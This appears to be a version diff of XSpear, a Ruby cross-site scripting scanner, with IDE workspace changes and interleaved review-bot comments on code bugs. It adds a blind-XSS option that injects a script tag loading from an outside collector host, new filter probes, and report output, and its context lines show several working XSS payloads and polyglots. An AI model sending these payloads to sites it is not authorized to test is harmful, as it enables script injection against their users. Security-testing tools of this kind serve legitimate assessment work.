XSpear 1.0.4 → 1.0.5
- checksums.yaml +4 -4
- data/.idea/workspace.xml +73 -53
- data/exe/XSpear +6 -2
- data/lib/XSpear/XSpearRepoter.rb +42 -2
- data/lib/XSpear/version.rb +1 -1
- data/lib/XSpear.rb +65 -24
- metadata +2 -3
- data/XSpear-1.0.3.gem +0 -0
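--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz:
-data.tar.gz:
+metadata.gz: b09dcb74e1734799658762e143a9faf16db70df6200de80ca2334cdbfc8c5d08
+data.tar.gz: dd840605d1fd1261b672f5bf27de9f648a924abeb685f6bea2334a4f2f3f3cc1
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: c29c155ff0ab0667c2ff4deab4618eaace8dae3410e159b141187f1cd13040679b6f84597ff250fe3e99ee740e8676dbaeccc7df405f6ccf19026441f9a928cb
+data.tar.gz: 568f793d58fa31180fa494aefa54557b2e927ee3c240a5fb789502bd1c43730c24f22849eb2ac6110daccb97a882f845a69b1aea723848b3561eb46a9e03d7af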
data/.idea/workspace.xml
CHANGED
|
@@ -2,7 +2,11 @@
|
|
|
2
2
|
<project version="4">
|
|
3
3
|
<component name="ChangeListManager">
|
|
4
4
|
<list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
|
|
5
|
+
<change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
|
|
5
6
|
<change beforePath="$PROJECT_DIR$/exe/XSpear" beforeDir="false" afterPath="$PROJECT_DIR$/exe/XSpear" afterDir="false" />
|
|
7
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
|
|
8
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
|
|
9
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
|
|
6
10
|
</list>
|
|
7
11
|
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
|
|
8
12
|
<option name="SHOW_DIALOG" value="false" />
|
|
@@ -15,11 +19,11 @@
|
|
|
15
19
|
</component>
|
|
16
20
|
<component name="FileEditorManager">
|
|
17
21
|
<leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
|
|
18
|
-
<file pinned="false" current-in-tab="
|
|
22
|
+
<file pinned="false" current-in-tab="false">
|
|
19
23
|
<entry file="file://$PROJECT_DIR$/exe/XSpear">
|
|
20
24
|
<provider selected="true" editor-type-id="text-editor">
|
|
21
|
-
<state relative-caret-position="
|
|
22
|
-
<caret line="
|
|
25
|
+
<state relative-caret-position="496">
|
|
26
|
+
<caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
|
|
23
27
|
</state>
|
|
24
28
|
</provider>
|
|
25
29
|
</entry>
|
|
@@ -39,8 +43,8 @@
|
|
|
39
43
|
<file pinned="false" current-in-tab="false">
|
|
40
44
|
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
41
45
|
<provider selected="true" editor-type-id="text-editor">
|
|
42
|
-
<state relative-caret-position="
|
|
43
|
-
<caret line="
|
|
46
|
+
<state relative-caret-position="528">
|
|
47
|
+
<caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
|
|
44
48
|
</state>
|
|
45
49
|
</provider>
|
|
46
50
|
</entry>
|
|
@@ -48,8 +52,8 @@
|
|
|
48
52
|
<file pinned="false" current-in-tab="false">
|
|
49
53
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
50
54
|
<provider selected="true" editor-type-id="text-editor">
|
|
51
|
-
<state relative-caret-position="
|
|
52
|
-
<caret line="
|
|
55
|
+
<state relative-caret-position="586">
|
|
56
|
+
<caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
|
|
53
57
|
</state>
|
|
54
58
|
</provider>
|
|
55
59
|
</entry>
|
|
@@ -67,12 +71,12 @@
|
|
|
67
71
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
68
72
|
<provider selected="true" editor-type-id="text-editor">
|
|
69
73
|
<state relative-caret-position="195">
|
|
70
|
-
<caret line="13" column="19" selection-start-line="13" selection-start-column="
|
|
74
|
+
<caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
|
|
71
75
|
</state>
|
|
72
76
|
</provider>
|
|
73
77
|
</entry>
|
|
74
78
|
</file>
|
|
75
|
-
<file pinned="false" current-in-tab="
|
|
79
|
+
<file pinned="false" current-in-tab="true">
|
|
76
80
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
|
|
77
81
|
<provider selected="true" editor-type-id="text-editor">
|
|
78
82
|
<state relative-caret-position="15">
|
|
@@ -84,7 +88,7 @@
|
|
|
84
88
|
<file pinned="false" current-in-tab="false">
|
|
85
89
|
<entry file="file://$PROJECT_DIR$/XSpear.gemspec">
|
|
86
90
|
<provider selected="true" editor-type-id="text-editor">
|
|
87
|
-
<state relative-caret-position="
|
|
91
|
+
<state relative-caret-position="105">
|
|
88
92
|
<caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
|
|
89
93
|
</state>
|
|
90
94
|
</provider>
|
|
@@ -109,19 +113,19 @@
|
|
|
109
113
|
<option name="CHANGED_PATHS">
|
|
110
114
|
<list>
|
|
111
115
|
<option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
|
|
112
|
-
<option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
|
|
113
116
|
<option value="$PROJECT_DIR$/XSpear.gemspec" />
|
|
114
117
|
<option value="$PROJECT_DIR$/README.md" />
|
|
115
118
|
<option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
|
|
116
|
-
<option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
|
|
117
|
-
<option value="$PROJECT_DIR$/lib/XSpear.rb" />
|
|
118
119
|
<option value="$PROJECT_DIR$/exe/XSpear" />
|
|
120
|
+
<option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
|
|
121
|
+
<option value="$PROJECT_DIR$/lib/XSpear.rb" />
|
|
122
|
+
<option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
|
|
119
123
|
</list>
|
|
120
124
|
</option>
|
|
121
125
|
</component>
|
|
122
|
-
<component name="ProjectFrameBounds"
|
|
123
|
-
<option name="x" value="-
|
|
124
|
-
<option name="y" value="-
|
|
126
|
+
<component name="ProjectFrameBounds">
|
|
127
|
+
<option name="x" value="-1920" />
|
|
128
|
+
<option name="y" value="-620" />
|
|
125
129
|
<option name="width" value="1920" />
|
|
126
130
|
<option name="height" value="1057" />
|
|
127
131
|
</component>
|
|
@@ -133,7 +137,6 @@
|
|
|
133
137
|
<foldersAlwaysOnTop value="true" />
|
|
134
138
|
</navigator>
|
|
135
139
|
<panes>
|
|
136
|
-
<pane id="Scope" />
|
|
137
140
|
<pane id="ProjectPane">
|
|
138
141
|
<subPane>
|
|
139
142
|
<expand>
|
|
@@ -171,6 +174,7 @@
|
|
|
171
174
|
<select />
|
|
172
175
|
</subPane>
|
|
173
176
|
</pane>
|
|
177
|
+
<pane id="Scope" />
|
|
174
178
|
</panes>
|
|
175
179
|
</component>
|
|
176
180
|
<component name="PropertiesComponent">
|
|
@@ -228,7 +232,8 @@
|
|
|
228
232
|
<option name="presentableId" value="Default" />
|
|
229
233
|
<updated>1562942814778</updated>
|
|
230
234
|
<workItem from="1562942816004" duration="15337000" />
|
|
231
|
-
<workItem from="1563638656518" duration="
|
|
235
|
+
<workItem from="1563638656518" duration="4985000" />
|
|
236
|
+
<workItem from="1563809961097" duration="3592000" />
|
|
232
237
|
</task>
|
|
233
238
|
<task id="LOCAL-00001" summary="init update">
|
|
234
239
|
<created>1562945899597</created>
|
|
@@ -405,20 +410,33 @@
|
|
|
405
410
|
<option name="project" value="LOCAL" />
|
|
406
411
|
<updated>1563648949262</updated>
|
|
407
412
|
</task>
|
|
408
|
-
<
|
|
413
|
+
<task id="LOCAL-00026" summary="verbose가 1일 떄 배너 출력되지 않도록 수정">
|
|
414
|
+
<created>1563649920055</created>
|
|
415
|
+
<option name="number" value="00026" />
|
|
416
|
+
<option name="presentableId" value="LOCAL-00026" />
|
|
417
|
+
<option name="project" value="LOCAL" />
|
|
418
|
+
<updated>1563649920055</updated>
|
|
419
|
+
</task>
|
|
420
|
+
<task id="LOCAL-00027" summary="verbose가 1일 떄 배너 출력되지 않도록 수정">
|
|
421
|
+
<created>1563649975625</created>
|
|
422
|
+
<option name="number" value="00027" />
|
|
423
|
+
<option name="presentableId" value="LOCAL-00027" />
|
|
424
|
+
<option name="project" value="LOCAL" />
|
|
425
|
+
<updated>1563649975625</updated>
|
|
426
|
+
</task>
|
|
427
|
+
<option name="localTasksCounter" value="28" />
|
|
409
428
|
<servers />
|
|
410
429
|
</component>
|
|
411
430
|
<component name="TimeTrackingManager">
|
|
412
|
-
<option name="totallyTimeSpent" value="
|
|
431
|
+
<option name="totallyTimeSpent" value="23914000" />
|
|
413
432
|
</component>
|
|
414
433
|
<component name="ToolWindowManager">
|
|
415
434
|
<frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
|
|
416
435
|
<editor active="true" />
|
|
417
436
|
<layout>
|
|
418
|
-
<window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.
|
|
437
|
+
<window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16240682" />
|
|
419
438
|
<window_info id="Structure" order="1" side_tool="true" weight="0.25" />
|
|
420
439
|
<window_info id="Favorites" order="2" side_tool="true" />
|
|
421
|
-
<window_info anchor="bottom" id="Messages" weight="0.32953367" />
|
|
422
440
|
<window_info anchor="bottom" id="Message" order="0" />
|
|
423
441
|
<window_info anchor="bottom" id="Find" order="1" />
|
|
424
442
|
<window_info anchor="bottom" id="Run" order="2" weight="0.32953367" />
|
|
@@ -431,6 +449,7 @@
|
|
|
431
449
|
<window_info anchor="bottom" id="Version Control" order="9" />
|
|
432
450
|
<window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.29637307" />
|
|
433
451
|
<window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
|
|
452
|
+
<window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
|
|
434
453
|
<window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
|
|
435
454
|
<window_info anchor="right" id="Ant Build" order="1" weight="0.25" />
|
|
436
455
|
<window_info anchor="right" content_ui="combo" id="Hierarchy" order="2" weight="0.25" />
|
|
@@ -457,7 +476,8 @@
|
|
|
457
476
|
<MESSAGE value="Add show version & edit help, version in banner" />
|
|
458
477
|
<MESSAGE value="Edit version , release 1.0.2" />
|
|
459
478
|
<MESSAGE value="Add EventHandler Test logic (1.0.3), edit description on report" />
|
|
460
|
-
<
|
|
479
|
+
<MESSAGE value="verbose가 1일 떄 배너 출력되지 않도록 수정" />
|
|
480
|
+
<option name="LAST_COMMIT_MESSAGE" value="verbose가 1일 떄 배너 출력되지 않도록 수정" />
|
|
461
481
|
</component>
|
|
462
482
|
<component name="editorHistoryManager">
|
|
463
483
|
<entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
|
|
@@ -473,19 +493,6 @@
|
|
|
473
493
|
<entry file="file://$PROJECT_DIR$/bin/setup">
|
|
474
494
|
<provider selected="true" editor-type-id="text-editor" />
|
|
475
495
|
</entry>
|
|
476
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
477
|
-
<provider selected="true" editor-type-id="text-editor">
|
|
478
|
-
<state relative-caret-position="195">
|
|
479
|
-
<caret line="13" column="19" selection-start-line="13" selection-start-column="11" selection-end-line="13" selection-end-column="19" />
|
|
480
|
-
</state>
|
|
481
|
-
</provider>
|
|
482
|
-
</entry>
|
|
483
|
-
<entry file="file:///usr/local/bin/rake">
|
|
484
|
-
<provider selected="true" editor-type-id="text-editor" />
|
|
485
|
-
</entry>
|
|
486
|
-
<entry file="file://$PROJECT_DIR$/Rakefile">
|
|
487
|
-
<provider selected="true" editor-type-id="text-editor" />
|
|
488
|
-
</entry>
|
|
489
496
|
<entry file="file://$PROJECT_DIR$/README.md">
|
|
490
497
|
<provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
|
|
491
498
|
<state split_layout="SPLIT">
|
|
@@ -496,45 +503,58 @@
|
|
|
496
503
|
</state>
|
|
497
504
|
</provider>
|
|
498
505
|
</entry>
|
|
499
|
-
<entry file="file://$PROJECT_DIR$/XSpear.
|
|
506
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/banner.rb">
|
|
500
507
|
<provider selected="true" editor-type-id="text-editor">
|
|
501
|
-
<state relative-caret-position="
|
|
502
|
-
<caret line="
|
|
508
|
+
<state relative-caret-position="180">
|
|
509
|
+
<caret line="12" column="69" selection-start-line="12" selection-start-column="69" selection-end-line="12" selection-end-column="69" />
|
|
503
510
|
</state>
|
|
504
511
|
</provider>
|
|
505
512
|
</entry>
|
|
506
|
-
<entry file="file://$PROJECT_DIR$/
|
|
513
|
+
<entry file="file://$PROJECT_DIR$/Rakefile">
|
|
514
|
+
<provider selected="true" editor-type-id="text-editor" />
|
|
515
|
+
</entry>
|
|
516
|
+
<entry file="file:///usr/local/bin/rake">
|
|
517
|
+
<provider selected="true" editor-type-id="text-editor" />
|
|
518
|
+
</entry>
|
|
519
|
+
<entry file="file://$PROJECT_DIR$/exe/XSpear">
|
|
507
520
|
<provider selected="true" editor-type-id="text-editor">
|
|
508
|
-
<state relative-caret-position="
|
|
509
|
-
<caret line="
|
|
521
|
+
<state relative-caret-position="496">
|
|
522
|
+
<caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
|
|
510
523
|
</state>
|
|
511
524
|
</provider>
|
|
512
525
|
</entry>
|
|
513
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/
|
|
526
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
514
527
|
<provider selected="true" editor-type-id="text-editor">
|
|
515
|
-
<state relative-caret-position="
|
|
516
|
-
<caret line="13" lean-forward="true" selection-start-line="13" selection-end-line="13" />
|
|
528
|
+
<state relative-caret-position="195">
|
|
529
|
+
<caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
|
|
517
530
|
</state>
|
|
518
531
|
</provider>
|
|
519
532
|
</entry>
|
|
520
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/
|
|
533
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
521
534
|
<provider selected="true" editor-type-id="text-editor">
|
|
522
|
-
<state relative-caret-position="
|
|
523
|
-
<caret line="
|
|
535
|
+
<state relative-caret-position="586">
|
|
536
|
+
<caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
|
|
524
537
|
</state>
|
|
525
538
|
</provider>
|
|
526
539
|
</entry>
|
|
527
540
|
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
528
541
|
<provider selected="true" editor-type-id="text-editor">
|
|
529
|
-
<state relative-caret-position="
|
|
530
|
-
<caret line="
|
|
542
|
+
<state relative-caret-position="528">
|
|
543
|
+
<caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
|
|
531
544
|
</state>
|
|
532
545
|
</provider>
|
|
533
546
|
</entry>
|
|
534
|
-
<entry file="file://$PROJECT_DIR$/
|
|
547
|
+
<entry file="file://$PROJECT_DIR$/XSpear.gemspec">
|
|
535
548
|
<provider selected="true" editor-type-id="text-editor">
|
|
536
|
-
<state relative-caret-position="
|
|
537
|
-
<caret line="
|
|
549
|
+
<state relative-caret-position="105">
|
|
550
|
+
<caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
|
|
551
|
+
</state>
|
|
552
|
+
</provider>
|
|
553
|
+
</entry>
|
|
554
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
|
|
555
|
+
<provider selected="true" editor-type-id="text-editor">
|
|
556
|
+
<state relative-caret-position="15">
|
|
557
|
+
<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
|
|
538
558
|
</state>
|
|
539
559
|
</provider>
|
|
540
560
|
</entry>
|
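--- a/data/exe/XSpear
+++ b/data/exe/XSpear
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 
 require "XSpear"
-Options = Struct.new(:url, :data, :headers, :params, :thread, :verbose, :output)
+Options = Struct.new(:url, :data, :headers, :params, :thread, :verbose, :output, :blind)
 class Parser
 def self.parse(options)
 args = Options.new('xspear')
@@ -33,6 +33,10 @@ class Parser
 args.params = n
 end
 
+opts.on('-b', '--BLIND=URL', '[optional] Add vector of Blind XSS',' + with XSS Hunter, ezXSS, HBXSS, etc...',' + e.g : -b https://hahwul.xss.ht') do |n|
+args.blind = n
+end
+
 opts.on('-t', '--threads=NUMBER', '[optional] thread , default: 10') do |n|
 args.thread = n
 end
@@ -78,5 +82,5 @@ options.verbose = 2 unless options.verbose
 if options.verbose.to_i != 1
 banner
 end
-s = XspearScan.new options.url, options.data, options.headers, options.params, options.thread.to_i, options.output, options.verbose
+s = XspearScan.new options.url, options.data, options.headers, options.params, options.thread.to_i, options.output, options.verbose, options.blind
 s.run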
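Review bot: The `-b/--BLIND=URL` handler stores `n` without checking that it is an absolute http(s) URL, and XSpear.rb interpolates it verbatim into an unquoted `<script src=#{@blind_url}></script>` attribute, so a value containing whitespace, `>` or no scheme silently yields a broken probe instead of an error. Assuming `opts` is an `OptionParser`, reject bad input at parse time with `raise OptionParser::InvalidArgument, n unless n.match?(%r{\Ahttps?://\S+\z})` placed before `args.blind = n`. The `Parser.parse` body continues outside the hunk.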
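--- a/data/lib/XSpear/XSpearRepoter.rb
+++ b/data/lib/XSpear/XSpearRepoter.rb
@@ -19,6 +19,7 @@ class XspearRepoter
 @endtime = nil
 @issue = []
 @query = []
+@filtered_objects = {}
 # type : i,v,l,m,h
 # param : paramter
 # type :
@@ -29,6 +30,13 @@ class XspearRepoter
 # callback
 end
 
+def add_issue_first(type, issue, param, payload, pattern, description)
+rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
+rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
+@issue.insert(0,["-", rtype[type], rissue[issue], param, pattern, description])
+@query.push payload
+end
+
 def add_issue(type, issue, param, payload, pattern, description)
 rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
 rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
@@ -36,6 +44,9 @@ class XspearRepoter
 @query.push payload
 end
 
+def set_filtered f
+@filtered_objects = f
+end
 def set_endtime
 @endtime = Time.now
 end
@@ -58,13 +69,42 @@ class XspearRepoter
 def to_html; end
 
 def to_cli
+rurl = ""
+if @url.length > 66
+rurl = @url[0..66]+"... (snip)"
+else
+rurl = @url
+end
 table = Terminal::Table.new
-table.title = "[ XSpear report ]\n#{
+table.title = "[ XSpear report ]".red+"\n#{rurl}\n#{@starttime} ~ #{@endtime} Found #{@issue.length} issues."
 table.headings = ['NO','TYPE','ISSUE','PARAM','PAYLOAD','DESCRIPTION']
 table.rows = @issue
 #table.style = {:width => 80}
 puts table
-puts "<
+puts "< Not Filtered >".yellow
+@filtered_objects.each do |key, value|
+eh = []
+tag = []
+sc = []
+puts "[#{key}]".blue+" param"
+value.each do |n|
+if n.include? "=64"
+# eh
+eh.push n.chomp("=64")
+elsif n.include? "xsp<"
+# tag
+n = n.sub("xsp<","")
+tag.push n.chomp(">")
+else
+# sc
+sc.push n.sub("XsPeaR","")
+end
+end
+puts " + Special Char: ".green+"#{sc.map(&:inspect).join(',').gsub('"',"")}"
+puts " + Event Handler: ".green+"#{eh.map(&:inspect).join(',')}"
+puts " + HTML Tag: ".green+"#{tag.map(&:inspect).join(',')}"
+end
+puts "< Raw Query >".yellow
 @query.each_with_index do |q, i|
 puts "[#{i}] "+@url+"?"+q
 end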
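Review bot: `add_issue_first` copies the `rtype` and `rissue` lookup tables verbatim from `add_issue`, including the `"MIDUM"` and `"FILERD RULE"` spellings, so any future correction has to be made twice; hoist them to class-level `RTYPE = {...}.freeze` / `RISSUE = {...}.freeze` constants and have both methods read those. In `to_cli`, the fallback `else` branch prints anything that is neither an `=64` event-handler probe nor an `xsp<` tag probe under "Special Char" after stripping `XsPeaR`; the blind-XSS probe that XSpear.rb registers with the placeholder pattern `"NOTDETECTED"` would show up there unchanged, so either skip that placeholder explicitly or carry an explicit probe kind instead of sniffing the pattern text. `set_filtered` replaces the hash wholesale and is undocumented; a one-line comment such as `# Replace the per-parameter lists of probes the target did not filter (filled in by XspearScan).` would help. The XspearRepoter class itself starts outside the hunks.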
data/lib/XSpear/version.rb
CHANGED
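--- a/data/lib/XSpear.rb
+++ b/data/lib/XSpear.rb
@@ -13,7 +13,7 @@ module XSpear
 end
 
 class XspearScan
-def initialize(url, data, headers, params, thread, output, verbose)
+def initialize(url, data, headers, params, thread, output, verbose, blind)
 @url = url
 @data = data
 @headers = headers
@@ -25,7 +25,9 @@ class XspearScan
 @thread = thread
 @output = output
 @verbose = verbose
+@blind_url = blind
 @report = XspearRepoter.new @url, Time.now
+@filtered_objects = {}
 end
 
 class ScanCallbackFunc
@@ -59,6 +61,17 @@ class XspearScan
 end
 end
 
+class CallbackNotAdded < ScanCallbackFunc
+def run
+if @response.body.include? @query
+log("i","reflected #{@query}")
+[false, true]
+else
+[false, false]
+end
+end
+end
+
 class CallbackErrorPatternMatch < ScanCallbackFunc
 def run
 info = "Found"
@@ -233,36 +246,53 @@ class XspearScan
 'onUnload',
 'onURLFlip'
 ]
+tags = [
+"script",
+"iframe"
+]
+special_chars =[
+">",
+"<",
+'"',
+"'",
+"`",
+";",
+"|",
+"(",
+")",
+"{",
+"}",
+"[",
+"]",
+":",
+".",
+",",
+"+",
+"-",
+"=",
+"$"
+]
 
 log('s', 'creating a test query.')
 r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
 r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
-# Check Special
-
-
-
-
-r.push makeQueryPattern('f', "XsPeaR`", "XsPeaR`", 'i', "not filtered "+"`".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR;', 'XsPeaR;', 'i', "not filtered "+";".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR|', 'XsPeaR|', 'i', "not filtered "+"|".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR(', 'XsPeaR(', 'i', "not filtered "+"(".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR)', 'XsPeaR)', 'i', "not filtered "+")".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR{', 'XsPeaR{', 'i', "not filtered "+"{".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR}', 'XsPeaR}', 'i', "not filtered "+"}".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR[', 'XsPeaR[', 'i', "not filtered "+"[".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR]', 'XsPeaR]', 'i', "not filtered "+"]".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR:', 'XsPeaR:', 'i', "not filtered "+":".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR.', 'XsPeaR.', 'i', "not filtered "+".".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR+', 'XsPeaR+', 'i', "not filtered "+"+".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR-', 'XsPeaR-', 'i', "not filtered "+"-".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR=', 'XsPeaR=', 'i', "not filtered "+"=".blue, CallbackStringMatch)
-r.push makeQueryPattern('f', 'XsPeaR$', 'XsPeaR$', 'i', "not filtered "+"$".blue, CallbackStringMatch)
+# Check Special Char
+special_chars.each do |sc|
+r.push makeQueryPattern('f', "XsPeaR#{sc}>", "XsPeaR#{sc}", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
+end
+
 # Check Event Handler
-r.push makeQueryPattern('f', '
+r.push makeQueryPattern('f', '\"><xspear onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
 event_handler.each do |ev|
-r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue,
+r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackNotAdded)
 end
+
+# Check HTML Tag
+tags.each do |tag|
+r.push makeQueryPattern('f', "\">xsp<#{tag}>", "xsp<#{tag}>", 'i', "not filtered "+"<#{tag}>".blue, CallbackNotAdded)
+end
+
+# Check Common XSS Payloads
 r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
 r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
 r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
@@ -273,6 +303,13 @@ class XspearScan
 r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
 r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//--><<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
 r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
+
+# Check Blind XSS Payload
+if !@blind_url.nil?
+payload = "<script src=#{@blind_url}></script>"
+r.push makeQueryPattern('f', "\"'>#{payload}", "NOTDETECTED", 'i', "", CallbackNotAdded)
+end
+
 r = r.flatten
 r = r.flatten
 log('s', "test query generation is complete. [#{r.length} query]")
@@ -291,6 +328,8 @@ class XspearScan
 if result[0]
 log(node[:category], (result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
 @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
+elsif node[:callback] == CallbackNotAdded
+@filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
 else
 log('d', (result[1]).to_s)
 end
@@ -299,6 +338,8 @@ class XspearScan
 end
 end.each(&:join)
 end
+
+@report.set_filtered @filtered_objects
 @report.set_endtime
 log('s', "finish scan. the report is being generated..")
 if @output == 'json'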
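Review bot: The new `elsif node[:callback] == CallbackNotAdded` branch records the pattern in `@filtered_objects` without looking at `result[1]`, yet `CallbackNotAdded#run` returns `[false, true]` when the pattern is reflected and `[false, false]` when it is not, so every special-char, event-handler and tag probe lands in the "< Not Filtered >" list whether or not the target filtered it. Gate the branch on the second element: `elsif node[:callback] == CallbackNotAdded && result[1]`. The nil?-check-then-assign on `@filtered_objects` also appears to run inside the thread block that `end.each(&:join)` joins, so two threads probing the same parameter can both observe nil and one entry is lost; guarding the update with a `Mutex#synchronize` around `(@filtered_objects[key] ||= []) << pattern` would close that. The enclosing method starts and ends outside these hunks.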
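--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: XSpear
 version: !ruby/object:Gem::Version
-version: 1.0.
+version: 1.0.5
 platform: ruby
 authors:
 - hahwul
 autorequire:
 bindir: exe
 cert_chain: []
-date: 2019-07-
+date: 2019-07-22 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: colorize
@@ -157,7 +157,6 @@ files:
 - LICENSE.txt
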